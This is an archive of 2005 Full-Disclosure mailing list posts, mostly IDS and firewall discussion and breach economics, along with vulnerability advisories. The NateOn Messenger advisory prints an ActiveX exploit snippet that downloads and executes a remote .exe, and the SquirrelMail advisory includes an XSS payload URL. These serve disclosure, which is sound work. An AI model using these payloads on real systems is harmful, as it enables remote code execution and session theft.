Re: [Full-disclosure] Is the Bottom Line Impacted by Security Breaches?

2005-09-28 Thread fd
On Wed, 28 Sep 2005, Kenneth F. Belva wrote:

> If the US population is 296 million and 40 million cardholders were
> affected, that means that 13.51 percent of the population would be
> affected (on the assumption that is only US citizens that hold a
> Visa/Mastercard).

Roughly one in every seven-point-four listmates ...
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread arif . jatmoko



Hi,

Try looking at www.nss.co.uk for an IDS product comparison. They did a lot of
R&D. Obviously, Cisco is not a good one.
Why are you asking about IDS when we could use IPS?

Cheers,

From:               Fajar Edisya Putera <[EMAIL PROTECTED]>
Sent by:            [EMAIL PROTECTED]
To:                 full-disclosure@lists.grok.org.uk
cc:                 (bcc: Arif Jatmoko/IDN/SEA/CCA)
Subject:            [Full-disclosure] Suggestion for IDS
Date:               09/28/2005 03:54 PM
Please respond to:  Fajar Edisya Putera

Dear Experts,

Our company plans to install an IDS to protect our resources. I've already read
about Snort as a NIDS, but that's software based. I'm interested in a
hardware-based one that will work transparently with our Cisco PIX, with no need
to make changes in our firewall. What's your suggestion?

Thanks
Fajar






[Full-disclosure] [NRVA05-08] - Arbitrary file download by NateOn Messenger's ActiveX and DoS

2005-09-28 Thread saintlinu

Title:             Arbitrary File Download by NateOn Messenger's ActiveX and DoS
Discoverer:        PARK, GYU TAE ([EMAIL PROTECTED])
Advisory No.:      NRVA05-08
Critical:          Moderately Critical
Impact:            Arbitrary file download by NateOn Messenger's ActiveX and DoS
Where:             From remote
Operating System:  Windows Only
Solution:          Unpatched yet
Workaround:        N / A

Notice:            09. 17. 2005 Initiate notified
                   09. 23. 2005 2nd notified
                   09. 27. 2005 3rd notified
                   09. 29. 2005 Vendor didn't respond. Disclosure of vulnerability

Description:

The NateOn Messenger (see NRVA05-02) is an Internet instant messenger such as
MSN, Yahoo and so on.

If NateOn Messenger is installed, then it can be exploited via the
'NateonDownloadManager.ocx' ActiveX,

and there is another vulnerability like a Buffer Overflow.

See the following details:

NOT INCLUDED HERE BUT A PIECE OF CODE

<--snip-->

 i = GotNate.IsNateonInstall();

 if( i == 1 ) {
   alert('NateOn Messenger already installed. Do Attack ...');

   // if you want to second order attack then try
   i = GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','c:\\windows\\system32\\cmd.exe');

   // if you want to crash the victim system then try
   i = GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','very_long_strings_in_here');
 }
 else {
   alert('NateOn Messenger NOT Installed');
 }


[Full-disclosure] SquirrelMail Address Add Plugin XSS

2005-09-28 Thread Moritz Naumann



SA0002

++++++++++++++++++++++++++++++++++++++
+ SquirrelMail Address Add Plugin XSS +
++++++++++++++++++++++++++++++++++++++


PUBLISHED ON
  Sep 28, 2005


PUBLISHED AT
  http://moritz-naumann.com/adv/0002/sqmadd/0002.txt


PUBLISHED BY
  Moritz Naumann IT Consulting & Services
  Hamburg/Germany
  http://moritz-naumann.com/

  info AT moritz HYPHON naumann D0T com
  GPG key: http://moritz-naumann.com/keys/0x277F060C.asc


AFFECTED PRODUCT OR SERVICE
  Address Add Plugin for Squirrelmail >= v1.4.0
  by Jimmy Conner
  http://sqmail.org/


AFFECTED VERSION
  Address Add Plugin Versions 1.9 and 2.0
  Possibly versions < 1.9 (untested)


BACKGROUND
  Everybody knows XSS.
  http://en.wikipedia.org/wiki/XSS
  http://www.cgisecurity.net/articles/xss-faq.shtml


ISSUE
  An XSS vulnerability has been detected in the Address Add Plugin for
  Squirrelmail. The problem is caused by insufficient input sanitation.

  Sending a HTML email containing an IMG tag which provides a SRC
  attribute pointing at the vulnerable plugin may allow an attacker to
  retrieve the victims' cookie and session information without the
  victim being aware. The exploit may be triggered when the victim
  clicks on a specially crafted URL contained in the email and hovers
  the address book form field.

  The following partial URL demonstrates the issue:

/squirrelmail_root_dir/plugins/address_add/add.php?first=HOVER%20ME!%22%20onMouseOver=%22alert('foo');

  Please move your mouse pointer over the input field which says so.

  Other variables on this script can be misused in the same way.


WORKAROUND
  Disable Javascript or disable plugin.


SOLUTIONS
  Version 2.1 of the plugin fixes the issue. The update is available on
  both the developers' website at
  http://sqmail.org
  and on the SquirrelMail website at
  http://squirrelmail.org/plugin_view.php?id=101


TIMELINE
  Sep 24, 2005: Maintainer informed
  Sep 25, 2005: First maintainer reply
  Sep 25, 2005: Maintainer provides fix
  Sep 29, 2005: Public disclosure


CREDIT
  N/A


LICENSE
  Creative Commons Attribution-ShareAlike License Germany
  http://creativecommons.org/licenses/by-sa/2.0/de/





[Full-disclosure] Is the Bottom Line Impacted by Security Breaches?

2005-09-28 Thread Kenneth F. Belva
>> In the paper I ask: "If 40 million customer credit card numbers are
>> exposed in a security breach at the credit card processor CardSystems, why
>> do a significant number of people not cancel their Visa and/or
>> Mastercard?"

>Simple .. because Mastercard/Visa got to avoid having to notify their
>customers of the breach :

>http://www.consumeraffairs.com/news04/2005/cardsystems_court.html

>~Mike.

Mike,

I'm not so sure it's that simple... People were aware of it.

It certainly was all over the press at the time:

http://money.cnn.com/2005/06/17/news/master_card/
http://www.consumeraffairs.com/news04/2005/cardsystems_suit.html

If the US population is 296 million and 40 million cardholders were
affected, that means that 13.51 percent of the population would be
affected (on the assumption that is only US citizens that hold a
Visa/Mastercard).

Not everyone in the US has a Mastercard/Visa so the percentage of those
cardholders affected by the breach is in fact higher. It's hard to keep
that quiet by just not issuing letters to those affected by the breach.

What I wonder about is the applicability of the White and Case study.

When I hear figures of 20%, it really represents a serious financial impact.

One would hear about such loss from publicly traded companies, similar to
the 4% loss in Q2/2005 due to the Wendy's chili case.

Ken


Re: [Full-disclosure] Is the Bottom Line Impacted by Security Breaches?

2005-09-28 Thread Kurt Buff
Frank Knobbe wrote:


> Perhaps you should ask:
> "If 40 million customer social security numbers are exposed in a
> security breach at the credit card processor CardSystems, why do a
> significant number of people not request new social security numbers?"
> 
> After all, there is no limit on liability with fraud on those
> 
> Regards,
> Frank

Easy - you can't get one, so asking won't help.

Unless, of course, you're under the protection of the Federal Witness
Relocation program.


[Full-disclosure] [SECURITY] [DSA 797-2] Updated zsync i386 packages fix build error

2005-09-28 Thread Michael Stone

--------------------------------------------------------------------------
Debian Security Advisory DSA 797-2                      [EMAIL PROTECTED]
http://www.debian.org/security/                             Michael Stone
September 28th, 2005                   http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: zsync
Vulnerability  : DOS
Problem-Type   : buffer overflow
Debian-specific: no
CVE ID : CAN-2005-1849, CAN-2005-2096

zsync, a file transfer program, includes a modified local copy of
the zlib library, and is vulnerable to certain bugs fixed previously
in the zlib package.

There was a build error for the sarge i386 proftpd packages released in
DSA 797-1. A new build, zsync_0.3.3-1.sarge.1.2, has been prepared to
correct this error. The packages for other architectures are unaffected.

Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
--------------------------------

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/z/zsync/zsync_0.3.3-1.sarge.1.2_i386.deb
      Size/MD5 checksum:    94516 bb4ff605c6e3b94f23dd0986ca55e450

  These files will probably be moved into the stable distribution on
  its next update.

--------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/



Re: [Full-disclosure] Need comparison of netscreen and cyberguard

2005-09-28 Thread Ivan .
http://www.networkcomputing.com/showitem.jhtml?articleID=160910889&pgno=2

cheers
Ivan

On 9/29/05, adnan habib <[EMAIL PROTECTED]> wrote:
>
>
> hi all
>
> please help me i want some strong points for juniper ,,, help me to defeat
> cyberguard as it runs by secure computing now @ which they have their own
> firewall..
>
> best regards \
>


[Full-disclosure] Need comparison of netscreen and cyberguard

2005-09-28 Thread adnan habib



hi all

please help me i want some strong points for juniper ,,, help me to defeat
cyberguard as it runs by secure computing now @ which they have their own
firewall..

best regards \


Re: [Full-disclosure] urgent info require

2005-09-28 Thread Ivan .
A good start

http://www.networkcomputing.com/showitem.jhtml?articleID=160910889&pgno=2

cheers
Ivan

On 9/27/05, adnan habib <[EMAIL PROTECTED]> wrote:
>
>
> hi security gurus
>
> i want to implement juniper (netscreen) solution in my company ,,, moreover
> i want to replace cyberguard from juniper ... is there any one let me know
> any strong point that will support me in replacement like weakness in
> cyberguard etc,,
>
> your response is highly appreciated
>
> best regards
>


RE: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Paul Schmehl
--On Wednesday, September 28, 2005 18:49:32 +0200 Jan Nielsen 
<[EMAIL PROTECTED]> wrote:



> Hi Paul
>
> Can i ask what you were doing that a pix could not handle nat wise ?
> just wondering since I have done very extensive and complex nat'ing in
> pix'es from 506's up to 535's without any performance problems.

Many different things, none of which I'd prefer to discuss on a list. 
Suffice it to say that we make extremely heavy use of both NAT and PAT, 
with subnetting, over a large address space with a lot of traffic.


Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/


Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Paul Schmehl
--On Wednesday, September 28, 2005 09:48:36 -0700 Kevin Pawloski 
<[EMAIL PROTECTED]> wrote:



> Does the Tipping Point appliance allow you to create custom rules now?


Yes, for some definition of "rules".  For example, you can block individual 
host/port combos or ports or hosts, that sort of thing.  But if you're 
referring to rules like snort rules, which allow you to get really 
granular, not that I'm aware of.  Of course, I'm not TP CLI guru either. 
It has a cisco-like cli that might allow you to do a great deal more than 
what we've been doing through the mgmt console.


Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/


Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Paul Schmehl
--On Wednesday, September 28, 2005 17:48:59 +0100 "Paul S. Brown" 
<[EMAIL PROTECTED]> wrote:



> On Wednesday 28 September 2005 16:56, Michael Holstein wrote:
>
>>> If you NAT a lot, PIX can't handle the load.  It also isn't flexible
>>> enough.
>>
>> Huh? .. the FWSM (which is PIX and you can have 4 of them in a chassis)
>> can handle 100 interfaces, 5gbps, 100k CPS, and 1M concurrent per blade.
>>
>> http://www.cisco.com/en/US/products/hw/modules/ps2706/ps4452/
>>
>> Show me an OpenBSD system that can handle 400 interfaces, 20gbps, and 4M
>> connections (and can do HSRP, etc).
>>
>> (I'm not trying to start an open-source "holy war" on a newsgroup .. I
>> use pf too, where I need the granularity -- just not on the whole
>> network).
>
> I suspect the argument here has to be cost-for-cost - in the price range
> for a decent beefy OpenBSD box you aren't going to be using FWSMs, and I
> can quite believe that the PIXen in that price range don't perform - the
> PIX 501 is specced at 60MB/s throughput and the cheapest retail price I
> can find for it is $678 for the unlimited license version - for the same
> money you can get a beefy PC which will push quite a bit more than 60MB/s

$678?  Ours were in the mid five figure range.  You must be talking about 
SOHO units.


Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/


Re: [Full-disclosure] IDS features (was: Suggestion for IDS)

2005-09-28 Thread Kevin Pawloski


Cutting down on false alerts would be a start and by false alerts I mean (in
this case) alerts such as receiving MS-SQL worm alerts on your Linux hosts.

Yes, you can setup suppression alerts and disable rules but the larger the
network you monitor the more cumbersome that becomes. SourceFire has their
RNA solution which attempts to cut down on this problem but it isn't all the
way there just yet. (Not to mention that feature comes at an additional cost)

On 9/28/05, Alejandro Barrera <[EMAIL PROTECTED]> wrote:
> Hi all,
>    Now that we're talking about IDS, which are, in the list's opinion, the
>    features they hate more about actual IDS's?
>    I mean, what features you dream of every time you have to play with your IDS
>    but you don't have?
>
>    Thanks in advance.
>
> --
> Alejandro Barrera García-Orea
> R&D Engineer
> c/ Alcala 268 28027 Madrid
> Office: +34 91 326 66 11
> Fax: +34 91 326 66 11
> e-mail: [EMAIL PROTECTED]

[Full-disclosure] Re: Active Directory and IIS on production servers, and clustering

2005-09-28 Thread Reto Inversini
Hi,

Derick Anderson schrieb:
> The company I work for (as the only systems administrator) is
> considering a new implementation of their web-based software. To support
> this we will be splitting our single domain into two domains, one for
> production servers and one for employee support (file servers and
> employee workstations). We'll be using at least two IIS servers as a
> front-end to a custom-built service in the production domain.

<...>

> 
> 1. Separation of roles is essential to security as well as reliability.
> 2. Highly sensitive services such as internal DNS and Active Directory
> should never reside on a publicly accessible server.

Yep. Another thing is, that you should harden your system. The more
services are needed the more complicated a system hardening (and
debugging, if something breaks) is. The more services are running, the
bigger the exposure is.

> 3. In general, web applications are the biggest attack surface of any
> organization in terms of threat volume and relative ease of
> exploitation.

Perfectly right. And they are also a good target for (D)DOS attacks ...
And you could also argue from the need for network segmentation. A
publicly available webserver belongs in a DMZ.

> I'd appreciate any thoughts on this as I am fighting to follow best
> practices in our server environments. I've been reading the Windows
> Server 2003 Security Guide which unfortunately lacks the "Never ever
> have your production IIS servers be domain controllers" statement but
> implies Reasons #1 and #2 with its approach to server hardening.

If you don't want to buy hardware, but invest a little bit in software,
you could consider using VMWare or Virtual Server to build up your
environment. But of course, if you do that, you have to trust the
virtualization techniques :-)

> My second question has to do with clustering: we plan to eventually
> cluster the IIS servers. What impact does that have on Active Directory
> services?

Don't do it - clustered webservers are a pain in the ass. If you want to
gain flexibility and availability use a dedicated load balancer.
Clustering a webserver just adds another level of complexity.

> Thanks,
> 
> Derick Anderson

Regards
Reto Inversini



Re: [Full-disclosure] Is the Bottom Line Impacted by Security Breaches?

2005-09-28 Thread Valdis . Kletnieks
On Wed, 28 Sep 2005 14:46:38 CDT, Todd Towles said:
> Plus, it was shown recently that personal credit card fraud via ID theft
> is smaller than victimless credit card fraud.
> 
> http://www.theregister.co.uk/2005/09/16/gartner_phantom_fraud/

The Google-provided ad at the top says:

Official Check Fraud
Our Solution Software Will Help Prevent Check Fraud-Free Whitepaper
www.sourcetech.com

Try as I might, I keep wanting to parse that as "Our software will guarantee 
that
all of your whitepapers do in fact contain check frauds" :)



Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Reto Inversini
Hi,

Michael Holstein wrote:
>> Our company plans to install an IDS to protect our resources. I've already
>> read about Snort as a NIDS, but that's software based. I'm interested
>> in a hardware-based one that will work transparently with our Cisco PIX,
>> with no need to make changes in our firewall. What's your suggestion?

Don't throw away your money would be my first advice :-) Think about
what you need to protect and against who. Calculate your risks and
define what measures could mitigate these - an IPS is just one of these
and IMHO not the first one I would use.

If you want to stick with Cisco, there is also an IDS module for the PIX:

http://www.cisco.com/warp/public/cc/pd/sqsw/sqidsz/

But I never played with it, so I can't give you any advice about that.

> 
> 
> My first piece of advice on this is to ignore any company that says they
> deliver a "turnkey" solution. Such a thing doesn't exist.

Full Ack.

> 
> Any IDS will work with any firewall .. unless, of course, you want to
> connect the two together (eg: dynamically ACL the PIX based on what the
> IDS sees). That, IMHO, is an invitation to DOS yourself (think .. I
> spoof a packet that --looks like an attack-- from your upstream router,
> or smtp server, etc). There's dozens of ways to do this, including free
> with snort.

To add to the burden: An IDS/IPS can be tricked in many ways by a
skilled attacker. Therefore, you still need other measures of protection
for your resources. Another question is, how you deal with encrypted
traffic, e.g. traffic to an SSL aware application. Of course you can
break up the SSL traffic and inspect it, but this has serious privacy
issues and poses another risk. If you don't break it up, your
application is still vulnerable to e.g. SQL Injections.

> 
> You can also examine snort's "inline" mode in which you setup bridging
> between two interfaces, and let snort "decide" which packets to forward.
> In order to make such a thing redundant, be prepared to do some fancy
> H/A stuff with a pair of servers.
>
> And don't forget .. an IDS is certainly not "fix and forget" .. it
> requires daily tinkering (new sigs come out daily .. and they're almost
> always noisy and require tuning). In most any decent sized network,
> having a dedicated admin to chase the IDS alerts and keep an eye on
> things is almost a given.

If you really want to "buy" something useful, hire the best admins
available - the ones that take it personally if a system/network doesn't
work as expected. A skilled admin is by far the best protection for your
resources.

> And as for having an IDS "protect" your network .. well .. forget that.
> An IDS is great for statistical research and forensics .. but with
> botnets and whatnot going SSL, your time/resources are much better
> spent finding your vulnerabilities and patching your hosts.

Yep, and if you want to go even further, harden your hosts, follow the
principle of least privilege and do a decent network separation. And if
you still have some money after that, you can go for an IPS. An IPS can
only work in a very well segmented and documented network. You need to
know your traffic very well, otherwise it would be a shot in your own
leg, if you deploy an IPS as the service interruptions caused by it
would exceed the downtimes by malicious attacks by far.

> 
> My $0.02.

I've thrown in another $0.02 :-)

> 
> Cheers,
> 
> Michael Holstein CISSP GCIA

Best regards
Reto Inversini


RE: [Full-disclosure] Is the Bottom Line Impacted by Security Breaches?

2005-09-28 Thread Todd Towles
Plus, it was shown recently that personal credit card fraud via ID theft
is smaller than victimless credit card fraud.

http://www.theregister.co.uk/2005/09/16/gartner_phantom_fraud/

It is a very good rundown on why the banks just really don't have a
reason to chase after them and stop them.

-Todd

> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf 
> Of Frank Knobbe
> Sent: Wednesday, September 28, 2005 1:54 PM
> To: [EMAIL PROTECTED]
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Is the Bottom Line Impacted by 
> Security Breaches?
> 
> On Wed, 2005-09-28 at 10:22 -0400, Kenneth F. Belva wrote:
> > In the paper I ask: "If 40 million customer credit card numbers are 
> > exposed in a security breach at the credit card processor 
> CardSystems, 
> > why do a significant number of people not cancel their Visa and/or 
> > Mastercard?"
> 
> Simple. The credit card numbers are exposed every time they 
> make a purchase as well. Now, it someone commits fraud with 
> your name and card number (which a convenience store clerk 
> can do himself... no high-profile server breach needed), then 
> the customer is only liable for minimal damages. The risk and 
> liability lies with the credit card company.
> 
> Perhaps you should ask:
> "If 40 million customer social security numbers are exposed 
> in a security breach at the credit card processor 
> CardSystems, why do a significant number of people not 
> request new social security numbers?"
> 
> After all, there is no limit on liability with fraud on those
> 
> Regards,
> Frank
> 
> 


Re: [Full-disclosure] Is the Bottom Line Impacted by Security Breaches?

2005-09-28 Thread Frank Knobbe
On Wed, 2005-09-28 at 10:22 -0400, Kenneth F. Belva wrote:
> In the paper I ask: "If 40 million customer credit card numbers are
> exposed in a security breach at the credit card processor CardSystems, why
> do a significant number of people not cancel their Visa and/or
> Mastercard?"

Simple. The credit card numbers are exposed every time they make a
purchase as well. Now, it someone commits fraud with your name and card
number (which a convenience store clerk can do himself... no
high-profile server breach needed), then the customer is only liable for
minimal damages. The risk and liability lies with the credit card
company.

Perhaps you should ask:
"If 40 million customer social security numbers are exposed in a
security breach at the credit card processor CardSystems, why do a
significant number of people not request new social security numbers?"

After all, there is no limit on liability with fraud on those

Regards,
Frank




[Full-disclosure] Bypassing Personal Firewall (Zone Alarm Pro) Using DDE-IPC

2005-09-28 Thread Debasis Mohanty
Hi All !!

While I was testing desktop based firewalls (here it is Zone Alarm Pro) with
the firewall evasion kit developed by me, I found that a very old flaw still
exists in many latest versions of desktop based firewalls. It is possible
for a malicious program to bypass a desktop based firewall by using DDE-IPC
(Direct Data Exchange - Interprocess Communications) which enables an
un-trusted program to communicate with the attacker or access internet via
other trusted programs (Ex: Internet Explorer). This flaw is known since
before year 2003. 

As per a post by Te Smith (Sr. Director, Corporate Communications, Zone
Labs), this issue is resolved in higher version Zone Alarm Pro having
Advanced Program Control feature. (Ref #
http://seclists.org/lists/bugtraq/2003/Jul/.html) However, I find that
this issue still exists in higher versions of Zone Alarm Pro and might also
exist in other desktop based firewalls.

I didn't find any good PoC around, so I thought of writing a PoC which can
demonstrate and explain how an un-trusted program can access internet or
establish connection with the attacker via other trusted programs by
leveraging over the DDE-IPC design flaw. 

The PoC can be downloaded from the following link:
http://hackingspirits.com/vuln-rnd/vuln-rnd.html



Cheers 
Tr0y (aka Debasis Mohanty)
www.hackingspirits.com




[Full-disclosure] Re: Is the Bottom Line Impacted by Security Breaches?

2005-09-28 Thread Michael Holstein

> I'm not so sure it's that simple... People were aware of it.

Um .. but *which* 40mil was it? Am I one of them? Hearing that 40mil
random people got nicked is one thing .. me getting a letter from MBNA
another.

Mastercard/Visa certainly know .. and so do some member banks, because
some of them (in Australia, IIRC) replaced their cards proactively.

Their "logic" behind this is that their "zero liability due to fraud"
clauses make it illogical to even care about compromised account numbers
.. but anyone that's tried to contest a charge (because most don't let
you do it online like AMEX does) .. can attest to what a major PITA that
is (certified mail, etc.).

> One would hear about such loss from publicly traded companies, similar to
> the 4% loss in Q2/2005 due to the Wendy's chili case.

And hopefully .. once they go public .. they'll be held a bit more
accountable.


~Mike.


RE: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Brown, James
> Show me an OpenBSD system that can handle 400 interfaces,
> 20gbps, and 4M connections (and can do HSRP, etc).
 
Regarding HSRP, OpenBSD now has failover with their CARP 
implementation.
And IPSec SA synchronization as well.
 
You may be interested in this presentation
 
http://www.nycbsdcon.org/downloads/NYCBSDCON_failover.pdf
 
Jim B.
 






Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Valdis . Kletnieks
On Wed, 28 Sep 2005 14:07:08 EDT, Michael Holstein said:

> PCI bandwidth at that rate is 127.2MB/sec (big B). Cisco's figure is 
> 60mb/sec (little b).



Crap. Sometime after I hit send, that 'b' magically turned lower-case. You're
right, it's only eating 1/8th the PCI bandwidth, not almost all of it. ;)



[Full-disclosure] IDS features (was: Suggestion for IDS)

2005-09-28 Thread Alejandro Barrera
Hi all,
   Now that we're talking about IDS, which are, in the list's opinion, the
   features you hate most about current IDSs?
   I mean, what features do you dream of every time you have to play with your IDS
   but don't have?

   Thanks in advance.


-- 
Alejandro Barrera García-Orea
R&D Engineer
c/ Alcala 268 28027 Madrid
Office: +34 91 326 66 11
Fax: +34 91 326 66 11
e-mail: [EMAIL PROTECTED]



[Full-disclosure] OpenServer 5.0.7 OpenServer 6.0.0 : UnZip File Permissions Change Vulnerability

2005-09-28 Thread please_reply_to_security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


__

SCO Security Advisory

Subject:            OpenServer 5.0.7 OpenServer 6.0.0 : UnZip File
                    Permissions Change Vulnerability
Advisory number:    SCOSA-2005.39
Issue date:         2005 September 28
Cross reference:    sr894724 fz532853 erg712904
                    sr894723 fz532852 erg712905
                    CAN-2005-2475
__


1. Problem Description

A vulnerability in unzip can be exploited by malicious,
local users to perform certain actions on a vulnerable
system with escalated privileges. The vulnerability is
caused by a race condition that exists when the uncompressed
file is closed and before its permissions are changed. This
can be exploited via hardlink attacks to change the permissions
of other files belonging to the user running unzip. Successful
exploitation requires that the malicious user be able to
delete the uncompressed file and replace it with a hardlink
to another file owned by the unzip user, before permissions
are set on the file.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CAN-2005-2475 to this issue.


2. Vulnerable Supported Versions

System              Binaries
------------------------------------------
OpenServer 5.0.7    unzip distribution
OpenServer 6.0.0    unzip distribution

3. Solution

The proper solution is to install the latest packages.


4. OpenServer 5.0.7

4.1 Location of Fixed Binaries

ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.39/507


4.2 Verification

MD5 (VOL.000.000) = d57b8a54b9547bef09ba1f25dbd2cbf1

md5 is available for download from
ftp://ftp.sco.com/pub/security/tools


4.3 Installing Fixed Binaries

Upgrade the affected binaries with the following sequence:

1) Download the VOL* files to a directory

2) Run the custom command, specify an install from media
   images, and specify the directory as the location of the
   images.

5. OpenServer 6.0.0

5.1 Location of Fixed Binaries

ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.39/600


5.2 Verification

MD5 (VOL.000.000) = f31e45c91c87409f487613fdc5c2fb01

md5 is available for download from
ftp://ftp.sco.com/pub/security/tools


5.3 Installing Fixed Binaries

Upgrade the affected binaries with the following sequence:

1) Download the VOL* files to a directory

2) Run the custom command, specify an install from media
   images, and specify the directory as the location of the
   images.

6. References

Specific references for this advisory:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2475
http://marc.theaimsgroup.com/?l=bugtraq&m=112300046224117&w=2
http://www.securityfocus.com/bid/14450
http://www.osvdb.org/18530
http://secunia.com/advisories/16309

SCO security resources:
http://www.sco.com/support/security/index.html
SCO security advisories via email
http://www.sco.com/support/forums/security.html

This security fix closes SCO incidents sr894724 fz532853
erg712904 sr894723 fz532852 erg712905.


7. Disclaimer

SCO is not responsible for the misuse of any of the information
we provide on this website and/or through our security
advisories. Our advisories are a service to our customers
intended to promote secure installation and use of SCO
products.


8. Acknowledgments

SCO would like to thank Imran Ghory for discovering this
weakness.

__

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (UnixWare)

iD8DBQFDOs1baqoBO7ipriERAlL6AJ42PH5zJVMpIwFFJW5/EaBFl1wLMACgmIV6
iU1iXNZQxpq86/Piz4bL2Bw=
=j0qW
-END PGP SIGNATURE-
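The window the advisory describes is the gap between closing the extracted file and applying its stored permissions by path name. As an added example (not SCO's or Info-ZIP's code, and not a claim about how the shipped fix was written), the following shows that ordering next to a hardened one that applies the mode through the still-open descriptor with fchmod() and refuses to reuse an existing name with O_EXCL. The sample content and mode are constructed, the function names are the example's own, and it assumes a POSIX system (fchmod is not available on Windows).

```python
import os
import tempfile
from typing import Dict

# Constructed sample: the bytes an archive entry would expand to, and the
# permission bits stored for it in the archive.  No real zip file is read.
SAMPLE_CONTENT = b"sample extracted data\n"
SAMPLE_MODE = 0o640


def extract_entry_unsafe(dest_path: str, data: bytes, mode: int) -> int:
    """The ordering the advisory describes: write the file, close it, and only
    then set permissions by *path name*.  Between close() and chmod() the name
    can be made to refer to a different inode, and chmod() follows the name,
    not the file that was written."""
    with open(dest_path, "wb") as fh:
        fh.write(data)
    # --- race window: nothing ties the next call to the inode written above ---
    os.chmod(dest_path, mode)
    return os.stat(dest_path).st_mode & 0o7777


def extract_entry_safe(dest_path: str, data: bytes, mode: int) -> int:
    """Hardened ordering: create the entry with O_EXCL (refuse a pre-existing
    name, whether regular file, symlink or hardlink), keep the descriptor open,
    and apply the mode with fchmod() on that descriptor before closing.  The
    permission change is then bound to the inode this process created, so a
    later swap of the path name cannot redirect it."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(dest_path, flags, 0o600)      # restrictive until fchmod below
    try:
        os.write(fd, data)
        st = os.fstat(fd)
        if st.st_nlink != 1:                   # sanity check on the inode we hold
            raise OSError("unexpected link count on freshly created entry")
        os.fchmod(fd, mode)                    # no path lookup involved
        return os.fstat(fd).st_mode & 0o7777
    finally:
        os.close(fd)


def run_demo() -> Dict[str, object]:
    """Extract the constructed sample with both orderings into a scratch
    directory and report the resulting modes; also show that the hardened
    version refuses to reuse an existing name."""
    with tempfile.TemporaryDirectory() as scratch:
        unsafe_mode = extract_entry_unsafe(os.path.join(scratch, "a.txt"),
                                           SAMPLE_CONTENT, SAMPLE_MODE)
        safe_path = os.path.join(scratch, "b.txt")
        safe_mode = extract_entry_safe(safe_path, SAMPLE_CONTENT, SAMPLE_MODE)
        try:
            extract_entry_safe(safe_path, b"second write", SAMPLE_MODE)
            refused = False
        except FileExistsError:
            refused = True
    return {"unsafe_mode": unsafe_mode, "safe_mode": safe_mode,
            "existing_name_refused": refused}


if __name__ == "__main__":
    print(run_demo())
```

Both functions produce the same mode when nothing interferes; the difference is only visible under contention, which is exactly why the path-based version passes ordinary testing. Refusing an existing name is a stricter default than an archiver's usual overwrite prompt, but it is the behaviour you want when the extraction directory is writable by other users.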


Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Michael Holstein

be lucky to have a budget for a McSE (you want fries with that?)


"Fries with that" ... LMAO .. good one ;)


(In the interests of fairness, you don't need much beefy if you're Cisco -
the listed technical specs on the innards of the PIX-501:

Processor: 133-MHz AMD SC520 Processor
Random access memory: 16 MB of SDRAM
Flash memory: 8 MB
System bus: Single 32-bit, 33-MHz PCI


And try to find a PC with this spec :

Maximum Heat Dissipation: 17.0 BTU/hr, full power usage (5W)

(you could back that one up with a 9v battery for quite some time ..)


Comparing the rated 60Mbytes/sec with that system bus, and the fact that
traditional designs will require at least 2 PCI accesses per (one inbound
from ethernet to memory, and one outbound from memory to the ethernet), and
it becomes clear that there's some major black magic - 2 PCI cycles per only
leaves them 6MBytes/second of PCI bandwidth (and more importantly, also means
that you need to have enough smarts to keep the inbound pipe drained and the
outbound pipe full all the time)


PCI bandwidth at that rate is 127.2MB/sec (big B). Cisco's figure is 
60mb/sec (little b).


PCI figure is 32B/8b * 33.3MHz * 10^6/1048576 = 127.2MB/sec.
The last part of that accounts for the decimal nature of MHz (10^6) 
versus binary nature of MB (2^20).


(Math not mine .. Google'd from 
http://www.pcguide.com/ref/mbsys/buses/funcBandwidth-c.html)


~Mike.


Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Valdis . Kletnieks
On Wed, 28 Sep 2005 17:48:59 BST, "Paul S. Brown" said:

> I suspect the argument here has to be cost-for-cost - in the price range for 
> a decent beefy OpenBSD box you aren't going to be using FWSMs, and I can quite 
> believe that the PIXen in that price range don't perform - the PIX 501 is 
> specced at 60MB/s throughput and the cheapest retail price I can find for it 
> is $678 for the unlimited license version - for the same money you can get a 
> beefy PC which will push quite a bit more than 60MB/s

http://www.dealtime.com/xPO-Cisco_PIX_Firewall_501_PIX_501_BUN_K9
has at the moment 4 quotes from $449 all the way down to $382 including 
shipping.
